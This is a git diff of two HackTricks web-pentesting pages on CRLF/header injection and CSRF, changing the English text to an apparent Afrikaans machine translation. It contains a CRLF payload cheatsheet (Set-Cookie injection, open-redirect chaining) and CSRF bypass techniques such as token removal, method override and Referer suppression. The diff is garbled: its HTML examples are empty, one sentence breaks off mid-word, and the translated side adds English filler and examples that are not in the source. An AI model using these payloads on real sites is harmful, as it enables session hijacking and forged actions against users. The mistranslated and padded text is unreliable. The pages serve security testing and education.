-If a platform is taking **data from an HTTP request and using it without sanitizing** it to perform **requests** to a **memcache** server, an attacker could abuse this behaviour to **inject new memcache commands**.
+As 'n platform **data van 'n HTTP-versoek neem en dit sonder sanitasie** gebruik om **versoeke** na 'n **memcache**-bediener uit te voer, kan 'n aanvaller hierdie gedrag misbruik om **nuwe memcache-opdragte in te spuit**.
 
-For example, in the original discovered vuln, cache keys were used to return the IP and port a user shuold connect to, and attackers were able to **inject memcache comands** that would **poison** the **cache to send the vistims details** (usrnames and passwords included) to the attacker servers:
+Byvoorbeeld, in die oorspronklike ontdekte kwesbaarheid is kas-sleutels gebruik om die IP en poort terug te gee waaraan 'n gebruiker moet koppel, en aanvallers kon **memcache-opdragte inspuit** wat die **kas sou vergiftig om die slagoffers se besonderhede** (gebruikersname en wagwoorde ingesluit) na die aanvaller se bedieners te stuur:
 
 
https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&h=178&auto=format&fit=crop

 
-Moreover, researchers also discovered that they could desync the memcache responses to send the attackers ip and ports to users whose email the attacker didn't know:
+Verder het navorsers ook ontdek dat hulle die memcache-responsies kon desinkroniseer om die aanvallers se IP en poorte na gebruikers te stuur wie se e-pos die aanvaller nie geken het nie:
 
 
https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/c6c1f3c4-d244-4bd9-93f7-2c88f139acfa/body-3f9ceeb9-3d6b-4867-a23f-e0e50a46a2e9_14.png?w=1322&h=506&auto=format&fit=crop

 
-### How to Prevent CRLF / HTTP Header Injections in Web Applications
+### Hoe om CRLF / HTTP-kopinspuitings in webtoepassings te voorkom
 
-To mitigate the risks of CRLF (Carriage Return and Line Feed) or HTTP Header Injections in web applications, the following strategies are recommended:
+Om die risiko van CRLF (Carriage Return en Line Feed) of HTTP-kopinspuitings in webtoepassings te verminder, word die volgende strategieë aanbeveel:
 
-1. **Avoid Direct User Input in Response Headers:**
-   The safest approach is to refrain from incorporating user-supplied input directly into response headers. 
+1. **Vermy Direkte Gebruikersinvoer in Reaksiekoppe:**
+Die veiligste benadering is om te vermy dat gebruikersverskafte insette direk in reaksiekoppe opgeneem word.
 
-2. **Encode Special Characters:**
-   If avoiding direct user input is not feasible, ensure to employ a function dedicated to encoding special characters like CR (Carriage Return) and LF (Line Feed). This practice prevents the possibility of CRLF injection.
+2. **Kodeer Spesiale Karakters:**
+As dit nie moontlik is om direkte gebruikersinvoer te vermy nie, moet 'n funksie wat spesiale karakters soos CR (Carriage Return) en LF (Line Feed) kodeer, gebruik word. Hierdie praktyk voorkom die moontlikheid van CRLF-inspuiting.
 
-3. **Update Programming Language:**
-   Regularly update the programming language used in your web applications to the latest version. Opt for a version that inherently disallows the injection of CR and LF characters within functions tasked with setting HTTP headers.
+3. **Werk die Programmeer- taal op:**
+Werk gereeld die programmeertaal wat in jou webtoepassings gebruik word na die nuutste weergawe. Kies 'n weergawe wat die inspuiting van CR- en LF-karakters binne funksies wat HTTP-koppe stel, inherent verbied.
 
+### SPOEDKAART
 
-### CHEATSHEET
-
-[Cheatsheet from here](https://twitter.com/NinadMishra5/status/1650080604174667777)
-
+[Spoedkaart van hier](https://twitter.com/NinadMishra5/status/1650080604174667777)
 ```
 1. HTTP Response Splitting
 • /%0D%0ASet-Cookie:mycookie=myvalue (Check if the response is setting this cookie)
 
 2. CRLF chained with Open Redirect
-• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2 
+• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2
 • /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2
 • /google.com/%2F..%0D%0AHeader-Test:test2
 • /%0d%0aLocation:%20http://example.com
@@ -224,17 +203,16 @@ To mitigate the risks of CRLF (Carriage Return and Line Feed) or HTTP Header Inj
 • %E5%98%BC = %3C = \u563c (<)
 • Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test
 ```
-
-## Automatic Tools
+## Outomatiese Gereedskap
 
 * [https://github.com/Raghavd3v/CRLFsuite](https://github.com/Raghavd3v/CRLFsuite)
 * [https://github.com/dwisiswant0/crlfuzz](https://github.com/dwisiswant0/crlfuzz)
 
-## Brute-Force Detection List
+## Brute-Force Deteksie Lys
 
 * [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt](https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt)
 
-## References
+## Verwysings
 * [**https://www.invicti.com/blog/web-security/crlf-http-header/**](https://www.invicti.com/blog/web-security/crlf-http-header/)
 * [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)
 * [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning)
@@ -242,20 +220,20 @@ To mitigate the risks of CRLF (Carriage Return and Line Feed) or HTTP Header Inj
 
 
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+As jy belangstel in 'n **hacking loopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende Pools skriftelik en mondeling benodig_).
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md
index c83adf72b..b4cf41e87 100644
--- a/pentesting-web/csrf-cross-site-request-forgery.md
+++ b/pentesting-web/csrf-cross-site-request-forgery.md
@@ -2,223 +2,208 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 

 
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
+Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutbeloningsjagters!
 
 **Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
+Gaan in gesprek met inhoud wat die opwinding en uitdagings van hacking ondersoek
 
 **Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
+Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte
 
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
+**Nuutste aankondigings**\
+Bly ingelig met die nuutste foutbelonings wat bekendgestel word en belangrike platform-opdaterings
 
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
+**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
 
 
-## Cross-Site Request Forgery (CSRF) Explained
+## Cross-Site Request Forgery (CSRF) Verduidelik
 
-**Cross-Site Request Forgery (CSRF)** is a type of security vulnerability found in web applications. It enables attackers to perform actions on behalf of unsuspecting users by exploiting their authenticated sessions. The attack is executed when a user, who is logged into a victim's platform, visits a malicious site. This site then triggers requests to the victim's account through methods like executing JavaScript, submitting forms, or fetching images.
+**Cross-Site Request Forgery (CSRF)** is 'n tipe sekuriteitskwesbaarheid wat in webtoepassings gevind word. Dit stel aanvallers in staat om aksies namens argeloos gebruikers uit te voer deur hul geauthentiseerde sessies uit te buit. Die aanval word uitgevoer wanneer 'n gebruiker, wat ingeteken is by 'n slagoffer se platform, 'n skadelike webwerf besoek. Hierdie webwerf veroorsaak dan versoek aan die slagoffer se rekening deur metodes soos die uitvoering van JavaScript, die indiening van vorms, of die ophaling van afbeeldings.
 
-### Prerequisites for a CSRF Attack
-To exploit a CSRF vulnerability, several conditions must be met:
+### Voorvereistes vir 'n CSRF-aanval
+Om 'n CSRF-kwesbaarheid uit te buit, moet verskeie voorwaardes voldoen word:
 
-1. **Identify a Valuable Action**: The attacker needs to find an action worth exploiting, such as changing the user's password, email, or elevating privileges.
-2. **Session Management**: The user's session should be managed solely through cookies or the HTTP Basic Authentication header, as other headers cannot be manipulated for this purpose.
-3. **Absence of Unpredictable Parameters**: The request should not contain unpredictable parameters, as they can prevent the attack.
+1. **Identifiseer 'n Waardevolle Aksie**: Die aanvaller moet 'n aksie vind wat die moeite werd is om uit te buit, soos die verandering van die gebruiker se wagwoord, e-pos, of verhoging van voorregte.
+2. **Sessiebestuur**: Die gebruiker se sessie moet slegs deur koekies of die HTTP Basiese Verifikasie-kop beheer word, aangesien ander koppe nie vir hierdie doel gemanipuleer kan word nie.
+3. **Afwees van Onvoorspelbare Parameters**: Die versoek mag nie onvoorspelbare parameters bevat nie, aangesien dit die aanval kan voorkom.
 
-### Defending Against CSRF
-Several countermeasures can be implemented to protect against CSRF attacks:
+### Verdediging teen CSRF
+Verskeie teenmaatreëls kan geïmplementeer word om teen CSRF-aanvalle te beskerm:
 
-* [**SameSite cookies**](hacking-with-cookies/#samesite): This attribute prevents the browser from sending cookies along with cross-site requests. [More about SameSite cookies](hacking-with-cookies/#samesite).
-* [**Cross-origin resource sharing**](cors-bypass.md): The CORS policy of the victim site can influence the feasibility of the attack, especially if the attack requires reading the response from the victim site. [Learn about CORS bypass](cors-bypass.md).
-* **User Verification**: Prompting for the user's password or solving a captcha can confirm the user's intent.
-* **Checking Referrer or Origin Headers**: Validating these headers can help ensure requests are coming from trusted sources. However, careful crafting of URLs can bypass poorly implemented checks, such as:
-  - Using `http://mal.net?orig=http://example.com` (URL ends with the trusted URL)
-  - Using `http://example.com.mal.net` (URL starts with the trusted URL)
-* **Modifying Parameter Names**: Altering the names of parameters in POST or GET requests can help in preventing automated attacks.
-* **CSRF Tokens**: Incorporating a unique CSRF token in each session and requiring this token in subsequent requests can significantly mitigate the risk of CSRF. The effectiveness of the token can be enhanced by enforcing CORS.
+* [**SameSite-koekies**](hacking-with-cookies/#samesite): Hierdie eienskap voorkom dat die blaaier koekies saam met kruiswebwerfversoeke stuur. [Meer oor SameSite-koekies](hacking-with-cookies/#samesite).
+* [**Cross-origin resource sharing**](cors-bypass.md): Die CORS-beleid van die slagoffer se webwerf kan die uitvoerbaarheid van die aanval beïnvloed, veral as die aanval vereis dat die respons van die slagoffer se webwerf gelees word. [Leer oor CORS-omseiling](cors-bypass.md).
+* **Gebruikersverifikasie**: Die versoek om die gebruiker se wagwoord te vra of 'n captcha op te los, kan die gebruiker se bedoeling bevestig.
+* **Kontroleer Verwysers of Oorsprongkoppe**: Die validering van hierdie koppe kan help om te verseker dat versoek van betroubare bronne afkomstig is. Tog kan sorgvuldige samestelling van URL's swak geïmplementeerde kontroles omseil, soos:
+- Gebruik van `http://mal.net?orig=http://example.com` (URL eindig met die betroubare URL)
+- Gebruik van `http://example.com.mal.net` (URL begin met die betroubare URL)
+* **Wysiging van Parametername**: Die wysiging van die name van parameters in POST- of GET-versoeke kan help om outomatiese aanvalle te voorkom.
+* **CSRF-tokens**: Die inkorporering van 'n unieke CSRF-token in elke sessie en die vereiste van hierdie token in volgende versoek kan die risiko van CSRF aansienlik verminder. Die doeltreffendheid van die token kan verhoog word deur CORS af te dwing.
 
-Understanding and implementing these defenses is crucial for maintaining the security and integrity of web applications.
+Die begrip en implementering van hierdie verdedigings is noodsaaklik vir die handhawing van die sekuriteit en integriteit van webtoepassings.
 
-## Defences Bypass
+## Verdedigingsomseiling
 
-### From POST to GET
+### Van POST na GET
 
-Maybe the form you want to abuse is prepared to send a **POST request with a CSRF token but**, you should **check** if a **GET** is also **valid** and if when you send a GET request the **CSRF token is still being validated**.
+Miskien is die vorm wat jy wil misbruik, gereed om 'n **POST-versoek met 'n CSRF-token te stuur**, maar jy moet **nagaan** of 'n **GET** ook **geldig** is en of die **CSRF-token steeds gevalideer word** wanneer jy 'n GET-versoek stuur.
 
-### Lack of token
+### Gebrek aan token
 
-Applications might implement a mechanism to **validate tokens** when they are present. However, a vulnerability arises if the validation is skipped altogether when the token is absent. Attackers can exploit this by **removing the parameter** that carries the token, not just its value. This allows them to circumvent the validation process and conduct a Cross-Site Request Forgery (CSRF) attack effectively.
+Toepassings kan 'n meganisme implementeer om **tokens te valideer** wanneer hulle teenwoordig is. 'n Kwesbaarheid ontstaan egter as die validering heeltemal omseil word wanneer die token afwesig is. Aanvallers kan dit uitbuit deur die parameter wat die token dra, te **verwyder**, nie net sy waarde nie. Dit stel hulle in staat om die valideringsproses te omseil en 'n Cross-Site Request Forgery (CSRF) aanval doeltreffend uit te voer.
 
-### CSRF token is not tied to the user session
+### CSRF-token is nie gekoppel aan die gebruikersessie nie
 
-Applications **not tying CSRF tokens to user sessions** present a significant **security risk**. These systems verify tokens against a **global pool** rather than ensuring each token is bound to the initiating session.
+Toepassings wat CSRF-tokens **nie aan gebruikersessies koppel nie**, bied 'n aansienlike **sekuriteitsrisiko**. Hierdie stelsels verifieer tokens teen 'n **globale poel** eerder as om te verseker dat elke token aan die inisieerende sessie gekoppel is.
 
-Here's how attackers exploit this:
+So misbruik aanvallers dit:
 
-1. **Authenticate** using their own account.
-2. **Obtain a valid CSRF token** from the global pool.
-3. **Use this token** in a CSRF attack against a victim.
+1. **Verifieer** met hul eie rekening.
+2. **Verkry 'n geldige CSRF-token** uit die globale poel.
+3. **Gebruik hierdie token** in 'n CSRF-aanval teen 'n slagoffer.
 
-This vulnerability allows attackers to make unauthorized requests on behalf of the victim, exploiting the application's **inadequate token validation mechanism**.
+Hierdie kwesbaarheid stel aanvallers in staat om ongemagtigde versoek op naam van die slagoffer te maak deur die toepassing se **onvoldoende token-valideringsmeganisme** uit te buit.
 
-### Method bypass
+### Metode-omseiling
 
-If the request is using a "**weird**" **method**, check if the **method** **override functionality** is working.
-For example, if it's **using a PUT** method you can try to **use a POST** method and **send**: _https://example.com/my/dear/api/val/num?**\_method=PUT**_
+As die versoek 'n "**vreemde**" **metode** gebruik, kyk of die **metode-oorrulfunksionaliteit** werk.
+Byvoorbeeld, as dit 'n **PUT**-metode gebruik, kan jy probeer om 'n **POST**-metode te gebruik en te **stuur**: _https://example.com/my/dear/api/val/num?**\_method=PUT**_
 
-This could also works sending the **\_method parameter inside the a POST request** or using the **headers**:
+Dit kan ook werk deur die **\_method-parameter binne 'n POST-versoek** te stuur of deur die **koppe** te gebruik:
 
 * _X-HTTP-Method_
 * _X-HTTP-Method-Override_
 * _X-Method-Override_
 
-### Custom header token bypass
+### Omseiling van aangepaste kop-token
 
-If the request is adding a **custom header** with a **token** to the request as **CSRF protection method**, then:
+As die versoek 'n **aangepaste kop** met 'n **token** by die versoek voeg as **CSRF-beskermingsmetode**, dan:
 
-* Test the request without the **Customized Token and also header.**
-* Test the request with exact **same length but different token**.
+* Toets die versoek sonder die **aangepaste token en ook die kop.**
+* Toets die versoek met presies **dieselfde lengte maar 'n ander token**.
 
-### CSRF token is verified by a cookie
-
-Applications may implement CSRF protection by duplicating the token in both a cookie and a request parameter or by setting a CSRF cookie and verifying if the token sent in the backend corresponds to the cookie. The application validates requests by checking if the token in the request parameter aligns with the value in the cookie.
-
-However, this method is vulnerable to CSRF attacks if the website has flaws allowing an attacker to set a CSRF cookie in the victim's browser, such as a CRLF vulnerability. The attacker can exploit this by loading a deceptive image that sets the cookie, followed by initiating the CSRF attack.
-
-Below is an example of how an attack could be structured:
+### CSRF-token word geverifieer deur 'n koekie
 
+Toepassings kan CSRF-beskerming implementeer deur die token in beide 'n koekie en 'n versoekparameter te dupliseer of deur 'n CSRF-koekie in te stel en te verifieer of die token wat in die agtergrond gestuur word, ooreenstem met die koek
 ```html
 
-  
-  
-  
-    

-      
-      
-      
-    

-    
-  
+
+
+
+

+
+
+
+

+
+
 
 
 ```
-
 {% hint style="info" %}
-Note that if the **csrf token is related with the session cookie this attack won't work** because you will need to set the victim your session, and therefore you will be attacking yourself.
+Let daarop dat as die **csrf-token verband hou met die sessiekoekie, sal hierdie aanval nie werk nie** omdat jy die slagoffer jou sessie moet stel, en dus sal jy jouself aanval.
 {% endhint %}
 
-### Content-Type change
+### Verandering van inhoudstipe
 
-According to [**this**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests), in order to **avoid preflight** requests using **POST** method these are the allowed Content-Type values:
+Volgens [**hierdie**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests), om **vooraanvrae te vermy** deur die **POST**-metode te gebruik, is hierdie die toegelate waardes vir Inhoudstipe:
 
 * **`application/x-www-form-urlencoded`**
 * **`multipart/form-data`**
 * **`text/plain`**
 
-However, note that the **severs logic may vary** depending on the **Content-Type** used so you should try the values mentioned and others like **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._
-
-Example (from [here](https://brycec.me/posts/corctf\_2021\_challenges)) of sending JSON data as text/plain:
+Let egter daarop dat die **bedienerslogika kan wissel** afhangende van die gebruikte Inhoudstipe, so jy moet die genoemde waardes probeer asook ander soos **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._
 
+Voorbeeld (van [hier](https://brycec.me/posts/corctf\_2021\_challenges)) van die stuur van JSON-data as teks/plain:
 ```html
 
-  
-    

-      
-    

-    
-  
+
+

+
+

+
+
 
 ```
+### Omleiding van Preflight-aanvrae vir JSON-data
 
-### Bypassing Preflight Requests for JSON Data
+Wanneer jy probeer om JSON-data via 'n POST-aanvraag te stuur, is dit nie direk moontlik om die `Content-Type: application/json` in 'n HTML-vorm te gebruik nie. Op dieselfde manier veroorsaak die gebruik van `XMLHttpRequest` om hierdie inhoudstipe te stuur 'n preflight-aanvraag. Daar is egter strategieë om moontlik hierdie beperking te omseil en te kyk of die bediener die JSON-data verwerk, ongeag die Content-Type:
 
-When attempting to send JSON data via a POST request, using the `Content-Type: application/json` in an HTML form is not directly possible. Similarly, utilizing `XMLHttpRequest` to send this content type initiates a preflight request. Nonetheless, there are strategies to potentially bypass this limitation and check if the server processes the JSON data irrespective of the Content-Type:
+1. **Gebruik Alternatiewe Inhoudstipes**: Gebruik `Content-Type: text/plain` of `Content-Type: application/x-www-form-urlencoded` deur `enctype="text/plain"` in die vorm in te stel. Hierdie benadering toets of die agterkant die data gebruik, ongeag die Content-Type.
 
-1. **Use Alternative Content Types**: Employ `Content-Type: text/plain` or `Content-Type: application/x-www-form-urlencoded` by setting `enctype="text/plain"` in the form. This approach tests if the backend utilizes the data regardless of the Content-Type.
-   
-2. **Modify Content Type**: To avoid a preflight request while ensuring the server recognizes the content as JSON, you can send the data with `Content-Type: text/plain; application/json`. This doesn't trigger a preflight request but might be processed correctly by the server if it's configured to accept `application/json`.
+2. **Wysig Inhoudstipe**: Om 'n preflight-aanvraag te vermy terwyl die bediener die inhoud as JSON herken, kan jy die data stuur met `Content-Type: text/plain; application/json`. Dit veroorsaak nie 'n preflight-aanvraag nie, maar dit kan korrek deur die bediener verwerk word as dit gekonfigureer is om `application/json` te aanvaar.
 
-3. **SWF Flash File Utilization**: A less common but feasible method involves using an SWF flash file to bypass such restrictions. For an in-depth understanding of this technique, refer to [this post](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937).
+3. **SWF Flash-lêergebruik**: 'n Minder algemene maar uitvoerbare metode behels die gebruik van 'n SWF-flash-lêer om sulke beperkings te omseil. Vir 'n dieper begrip van hierdie tegniek, verwys na [hierdie pos](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937).
 
-### Referrer / Origin check bypass
+### Verwysings- / Oorsprong-omseiling
 
-**Avoid Referrer header**
-
-Applications may validate the 'Referer' header only when it's present. To prevent a browser from sending this header, the following HTML meta tag can be used:
+**Vermy Verwysingskop**
 
+Toepassings kan die 'Referer'-kop slegs valideer as dit teenwoordig is. Om te voorkom dat 'n webblaaier hierdie kop stuur, kan die volgende HTML-meta-etiket gebruik word:
 ```xml
 
 ```
+Dit verseker dat die 'Referer' kop nie ingesluit word nie, wat moontlik validasie kontroles in sommige toepassings kan omseil.
 
-This ensures the 'Referer' header is omitted, potentially bypassing validation checks in some applications.
-
-**Regexp bypasses**
+**Regexp omseilings**
 
 {% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
 [url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
 {% endcontent-ref %}
 
-To set the domain name of the server in the URL that the Referrer is going to send inside the parameters you can do:
-
+Om die domeinnaam van die bediener in die URL in te stel wat die Verwysingsbron binne die parameters gaan stuur, kan jy doen:
 ```html
 
-  
-  
-  
-  
-    

-      
-      
-    

-    
-  
+
+
+
+
+

+
+
+

+
+
 
 ```
+### **KOP-metode omseil**
 
-### **HEAD method bypass**
+Die eerste deel van [**hierdie CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-vegsoda/solution) verduidelik dat [Oak se bronkode](https://github.com/oakserver/oak/blob/main/router.ts#L281), 'n router ingestel is om **HEAD-versoeke as GET-versoeke** te hanteer sonder 'n responsliggaam - 'n algemene omweg wat nie uniek is tot Oak nie. In plaas van 'n spesifieke hanterer wat met HEAD-versoeke werk, word hulle eenvoudigweg **aan die GET-hanterer gegee, maar die toepassing verwyder net die responsliggaam**.
 
-The first part of [**this CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-vegsoda/solution) is explained that [Oak's source code](https://github.com/oakserver/oak/blob/main/router.ts#L281), a router is set to **handle HEAD requests as GET requests** with no response body - a common workaround that isn't unique to Oak. Instead of a specific handler that deals with HEAD reqs, they're simply **given to the GET handler but the app just removes the response body**.
+Daarom, as 'n GET-versoek beperk word, kan jy eenvoudig 'n HEAD-versoek stuur wat as 'n GET-versoek verwerk sal word.
 
-Therefore, if a GET request is being limited, you could just **send a HEAD request that will be processed as a GET request**.
+## **Exploit-voorbeelde**
 
-## **Exploit Examples**
+### **Uitlek van CSRF-token**
 
-### **Exfiltrating CSRF Token**
-
-If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection/) vulnerability.
-
-### **GET using HTML tags**
+As 'n **CSRF-token** as **verdediging** gebruik word, kan jy probeer om dit te **uitlek** deur 'n [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) kwesbaarheid of 'n [**Dangling Markup**](dangling-markup-html-scriptless-injection/) kwesbaarheid te misbruik.
 
+### **GET met behulp van HTML-etikette**
 ```xml
 
 
404 - Page not found

 The URL you are requesting is no longer available
 ```
-
-Other HTML5 tags that can be used to automatically send a GET request are:
-
+Ander HTML5-etikette wat gebruik kan word om outomaties 'n GET-versoek te stuur, is:
 ```html
 
 
@@ -233,82 +218,136 @@ Other HTML5 tags that can be used to automatically send a GET request are:
 
 

 
 
 
 
 ```
+### Vorm GET-versoek
 
-### Form GET request
+'n GET-versoek word gebruik om inligting van 'n webbediener te versoek deur die inligting as deel van die URL-parameters te stuur. Dit is 'n eenvoudige manier om data van 'n webvorm na 'n bediener te stuur. Die data word in die URL-parameters gekodeer en is dus sigbaar in die URL-ry. Hier is 'n voorbeeld van 'n GET-versoek:
+
+```html
+

+    
+    
+    
+

+```
+
+In hierdie voorbeeld sal die gebruikersnaam en wagwoord wat deur die gebruiker ingevul word, as deel van die URL na die "/login"-roete gestuur word. Die URL sal soos volg lyk:
+
+```
+http://www.example.com/login?username=gebruiker&password=wagwoord
+```
+
+Dit is belangrik om te besef dat 'n GET-versoek nie geskik is vir die stuur van sensitiewe inligting soos wagwoorde nie, aangesien die data sigbaar is in die URL.
+```html
+
+
+
+
+

+
+
+

+
+
+
+```
+### Vorm POST versoek
+
+A form POST request is a type of HTTP request that is used to submit data to a server. It is commonly used in web applications to send data from a form to the server for processing. The data is sent in the body of the request, and the server processes it based on the specified action.
+
+In a form POST request, the data is typically sent as key-value pairs. The keys represent the names of the form fields, and the values represent the data entered by the user. The data can be sent in various formats, such as URL-encoded or JSON.
+
+To send a form POST request, you need to specify the target URL and the data to be sent. This can be done using HTML forms or programmatically using JavaScript or other programming languages. The request is then sent to the server, which processes the data and returns a response.
+
+Form POST requests are vulnerable to Cross-Site Request Forgery (CSRF) attacks, where an attacker tricks a user into unknowingly submitting a malicious form. To protect against CSRF attacks, web applications can implement measures such as using CSRF tokens or checking the origin of the request.
+
+Overall, form POST requests are a fundamental part of web development and are widely used for submitting data to servers. Understanding how they work and their vulnerabilities is essential for both developers and security professionals.
+```html
+
+
+
+

+ 
+
+ 
+

+
+
+
+```
+### Vorm POST-aanvraag deur middel van 'n iframe
+
+'n CSRF-aanval (Cross-Site Request Forgery) is 'n aanvalstegniek waar 'n aanvaller 'n gebruiker se vertroue in 'n webtoepassing misbruik om ongewenste aksies namens die gebruiker uit te voer. Een van die metodes wat gebruik kan word om 'n CSRF-aanval uit te voer, is deur 'n vorm POST-aanvraag te doen deur middel van 'n iframe.
+
+Hier is die stappe om 'n vorm POST-aanvraag deur middel van 'n iframe uit te voer:
+
+1. Skep 'n HTML-bladsy wat 'n vorm bevat wat jy wil indien.
+2. Skep 'n iframe-element op dieselfde bladsy en stel die bron (src) van die iframe in op die doelwit van jou aanval.
+3. Stel die waardes van die vormveld in op die waardes wat jy wil indien.
+4. Gebruik JavaScript om die vorm in die iframe te indien deur die `submit()`-metode van die vormelement aan te roep.
+
+Hier is 'n voorbeeld van hoe die HTML-kode kan lyk:
 
 ```html
 
-  
-  
-  
-    

-      
-      
-    

-    
-  
+
+  

+    
+    
+  

+
+  
+
+  
+
 
 ```
 
-### Form POST request
+Met hierdie tegniek sal die vorm POST-aanvraag outomaties ingedien word wanneer die bladsy gelaai word. Dit kan gebruik word om ongewenste aksies uit te voer, soos om 'n gebruiker se wagwoord te verander of om transaksies namens die gebruiker te doen.
 
+Dit is belangrik om te besef dat 'n CSRF-aanval slegs suksesvol sal wees as die gebruiker reeds aangemeld is by die doelwit-webtoepassing.
 ```html
-
-  
-  
-    

-       
-      
-       
-    

-    
-  
-
-```
-
-### Form POST request through iframe
-
-```html
-
 
-  
-   
-    

-      
-      
-    

-    
-  
+
+
+

+
+
+

+
+
 
 ```
-
-### **Ajax POST request**
-
+### **Ajax POST versoek**
 ```html
 
 ```
+### multipart/form-data POS-aanvraag
 
-### multipart/form-data POST request
